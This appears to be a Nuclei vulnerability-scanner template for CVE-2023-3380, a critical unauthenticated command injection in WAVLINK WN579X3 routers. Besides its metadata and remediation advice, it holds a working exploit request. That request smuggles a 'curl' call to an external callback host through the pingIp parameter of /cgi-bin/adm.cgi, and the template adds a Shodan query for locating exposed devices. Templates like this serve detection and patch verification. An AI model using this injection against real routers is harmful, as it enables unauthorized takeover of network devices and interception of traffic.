id: CVE-2023-3380 info: name: WAVLINK WN579X3 - Remote Command Execution author: pussycat0x severity: critical description: | Remote Command Execution vulnerability in WAVLINK WN579X3 routers via pingIp parameter in /cgi-bin/adm.cgi. impact: | Unauthenticated attackers can execute arbitrary commands through the pingIp parameter in the adm.cgi endpoint, potentially compromising the entire WAVLINK router and intercepting network traffic. remediation: | Update WAVLINK WN579X3 firmware to a patched version that properly sanitizes the pingIp parameter and prevents command injection in adm.cgi. reference: - https://github.com/sleepyvv/vul_report/blob/main/WAVLINK/WAVLINK-WN579X3-RCE.md - https://vuldb.com/?ctiid.232236 - https://vuldb.com/?id.232236 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-3380 cwe-id: CWE-74 epss-score: 0.80276 epss-percentile: 0.99143 cpe: cpe:2.3:o:wavlink:wn579x3_firmware:*:*:*:*:*:*:*:* metadata: vendor: wavlink product: wn579x3_firmware shodan-query: http.html:"Wavlink" tags: cve,cve2023,wavlink,rce,vuln flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "images/WAVLINK-logo.png" - "Wi-Fi APP Login" condition: and internal: true - raw: - | POST /cgi-bin/adm.cgi HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Referer: {{RootURL}}/ping.shtml page=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: status status: - 200 # digest: 490a00463044022047623f80d92c9c3535e1add663df3ec147a9cc3c0e4a3196ea08d69f46f0b8f50220120bb126daac035955219b81198b14c732170f9b3057cd77bec12d88e70441ab:922c64590222798bb761d5b6d8e72950